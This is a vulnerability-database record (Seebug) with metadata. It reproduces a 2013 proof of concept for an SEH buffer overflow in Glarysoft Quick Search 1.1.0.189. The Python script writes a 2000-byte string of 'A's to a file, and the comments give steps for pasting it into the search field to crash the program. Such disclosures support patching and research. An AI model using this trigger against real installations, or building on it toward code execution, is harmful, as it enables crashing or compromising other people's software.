ID SSV:79105 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
# Exploit Title: Quick Search Version 1.1.0.189 Buffer Overflow vulnerability(SEH)
# Date: 14-05-2013
# Exploit Author: ariarat
# Vendor Homepage: http://www.glarysoft.com/
# Software Link: http://download.glarysoft.com/qsearchsetup.exe
# Version: 1.1.0.189
# Tested on: [ Windows 7 & windows XP sp2,sp3]
#============================================================================================
# After creating txt file,open created file and copy the AAA... string to clipboard and
# then paste in Search section.for better results bring program in Full Mode and in Edit
# menu choose Match Path and then paste your string.
#
#============================================================================================
# Contact :
#------------------
# Web Page : http://ariarat.blogspot.com
# Email : mehdi.esmaeelpour@gmail.com
#============================================================================================
#!/usr/bin/python
filename="string.txt"
buffer = "\x41" * 2000
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
{"lastseen": "2017-11-19T13:34:08", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "_object_type": "robots.models.seebug.SeebugBulletin", "status": "poc", "enchantments": {"score": {"vector": "NONE", "value": 6.8}, "dependencies": {"references": [], "modified": "2017-11-19T13:34:08"}, "vulnersScore": 6.8}, "href": "https://www.seebug.org/vuldb/ssvid-79105", "references": [], "history": [], "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "id": "SSV:79105", "title": "Quick Search 1.1.0.189 - Buffer Overflow Vulnerability (SEH)", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 1, "sourceData": "\n # Exploit Title: Quick Search Version 1.1.0.189 Buffer Overflow vulnerability(SEH)\r\n# Date: 14-05-2013\r\n# Exploit Author: ariarat \r\n# Vendor Homepage: http://www.glarysoft.com/\r\n# Software Link: http://download.glarysoft.com/qsearchsetup.exe\r\n# Version: 1.1.0.189 \r\n# Tested on: [ Windows 7 & windows XP sp2,sp3]\r\n#============================================================================================\r\n# After creating txt file,open created file and copy the AAA... string to clipboard and\r\n# then paste in Search section.for better results bring program in Full Mode and in Edit \r\n# menu choose Match Path and then paste your string. \r\n#\r\n#============================================================================================\r\n# Contact :\r\n#------------------\r\n# Web Page : http://ariarat.blogspot.com\r\n# Email : mehdi.esmaeelpour@gmail.com\r\n#============================================================================================\r\n\r\n#!/usr/bin/python\r\n\r\nfilename="string.txt"\r\nbuffer = "\\x41" * 2000\r\ntextfile = open(filename , 'w')\r\ntextfile.write(buffer)\r\ntextfile.close()\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-79105", "type": "seebug", "objectVersion": "1.4"}